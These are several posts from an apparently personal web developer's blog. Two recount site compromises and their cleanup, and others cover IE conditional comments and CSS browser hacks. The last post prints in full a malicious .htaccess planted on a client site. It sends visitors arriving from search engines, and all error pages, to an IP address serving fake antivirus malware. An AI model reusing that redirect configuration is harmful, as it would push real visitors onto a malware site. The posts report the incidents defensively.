Pixelastic

Today, at about 9pm (GMT+12), I found my own blog hacked. When I wanted to access it, I was redirected to a malware site.

Half an hour later, it is back online again, and here is what I did.

First, I downloaded the webpage on my computer using curl http://www.pixelastic.com/ to analyse it in search of a clue on the attack vector.

Unfortunatly, I couldn't easily find the culprit. No img tag loading a php file, no XSS injection that I could find. My guess is that the attacker tampered the js files loaded to add its own custom evil script. But as my js files are concatened and compressed in a file with a md5 name, it wasn't obvious that they had been compromised.

After that, I sshed to the server and tried to find what files where modified since my last commit. As I'm using Mercurial for that, this was a simple matter of hg status.

And I got a shitload of result. Actually, all my php files had been modified (and as I'm using cakePHP, that means, a lot of file). Running hg diff, I found out that all the php code of each file had been replaced with an evil code (enclosed in several layers of eval+base64).

I updated my working directory to the latest commit with hg update --clean to get all those files as they were before the attack. Running hg status once more still showed a bunch of new php files added. Running hg purge finally get rid of them.

I finally deleted all the compressed css and js files, to force them to be created again, and that's it, the website is online again.

I still don't have a clue on how this happened. How did someone access my files ? Is that an XSS attack ? Is my password cracked ? Is there another security weakness I'm not aware of ?

EDIT : Got hacked again. Seeing that the cakePHP Cache files were deleted, I guess it is a known attack on a cake vulnerability. Got the website up again, but will fix it as soon as my holidays allow.

After stopping using ugly IE hacks and moving to conditionnal comments to load a special IE stylesheet, I now use conditional comments to mark my body element with classes reflecting the current IE version.

<!--[if IE 6]><body class="ie ie6 ie-lt8 ie-lt9"><![endif]-->
<!--[if IE 7]><body class="ie ie7 ie-lt8 ie-lt9"><![endif]-->
<!--[if IE 8]><body class="ie ie8 ie-lt9"><![endif]-->
<!--[if IE 9]><body class="ie ie9"><![endif]-->
<!--[if !IE]><!--><body class="nie"><!--<![endif]-->

This saves me a lot of trouble : less files to manage and easier fixes to write. I quite happy with this solution and have tested it accross several projects for the past 3 months. It works really well.

I had to work on a legacy project last week, where this technique wasn't implemented but all the css code was still compressed using CSSTidy. And I ran into a couple of issues.

CSSTidy messes the star and underscore hacks

Using the brilliant _property and *property hacks to target IE6 and IE7 does not work in conjunction with CSSTidy.

For the _property hack, the property is kept as-is, with the underscore, but as they are alphabetically arranged, the _background gets added before the background, rendering it absolutly useless.

On the other hand, on the *property, the * gets removed, and the value is merged with the original value of the correct property. Useless too.

Other solutions that worked

To avoid digging into CSSTidy one more time, I tried to find other ways to achieve the same effect.

To target IE6 I used the !ie6 hack by writing .mySelector { property:value !ie6; }. IE6 is dumb enough to understand any !blahblah as !important.

I could have also used the fact that IE6 understands .class1.class2 as .class2, and could have written .ie6.mySelector { property:value; } (of course, you have absolutly no class="ie6" in your code)

To target IE7 I made a custom selector that its parsing engine is the only one to understand : *:first-child + html .mySelector { property:value; }

I just found (via enure.net) a CSS rule using proprietary Mozilla filter that would allow one to specifically target Mozilla.

I'm not a huge fan of CSS hacks like that, I usually restrain them to the bare minimum of IE conditional comments. But in some edge cases, it is sometimes useful, if you really don't have other options.

I'd like to find the equivalent rules (using proprietary rules, no parser bug) for Safari, Chrome and Opera

@-moz-document url-prefix() { 
	p { color: red; }
}

Today a client called me telling me that its website was unavailable, or more exactly that the full content of the FTP was displayed instead of its homepage.

After a little investigation it appears that the .htaccess file had been modified, here was the content I found :

RewriteEngine On
ErrorDocument 400 http://217.23.5.232/hitin.php?land=20&affid=20116
ErrorDocument 401 http://217.23.5.232/hitin.php?land=20&affid=20116
ErrorDocument 403 http://217.23.5.232/hitin.php?land=20&affid=20116
ErrorDocument 404 http://217.23.5.232/hitin.php?land=20&affid=20116
ErrorDocument 500 http://217.23.5.232/hitin.php?land=20&affid=20116
RewriteCond %{HTTP_REFERER} .*google.* [OR]
RewriteCond %{HTTP_REFERER} .*ask.* [OR]
RewriteCond %{HTTP_REFERER} .*yahoo.* [OR]
RewriteCond %{HTTP_REFERER} .*excite.* [OR]
RewriteCond %{HTTP_REFERER} .*altavista.* [OR]
RewriteCond %{HTTP_REFERER} .*msn.* [OR]
RewriteCond %{HTTP_REFERER} .*netscape.* [OR]
RewriteCond %{HTTP_REFERER} .*aol.* [OR]
RewriteCond %{HTTP_REFERER} .*hotbot.* [OR]
RewriteCond %{HTTP_REFERER} .*goto.* [OR]
RewriteCond %{HTTP_REFERER} .*infoseek.* [OR]
RewriteCond %{HTTP_REFERER} .*mamma.* [OR]
RewriteCond %{HTTP_REFERER} .*alltheweb.* [OR]
RewriteCond %{HTTP_REFERER} .*lycos.* [OR]
RewriteCond %{HTTP_REFERER} .*search.* [OR]
RewriteCond %{HTTP_REFERER} .*metacrawler.* [OR]
RewriteCond %{HTTP_REFERER} .*bing.* [OR]
RewriteCond %{HTTP_REFERER} .*dogpile.*
RewriteRule ^(.*)$ http://217.23.5.232/hitin.php?land=20&affid=20116 [R=301,L]

A little search online told me that this IP refer to a malware website launching a fake Antivirus software installation.

I have no idea how the .htaccess got modified, but I changed the FTP password.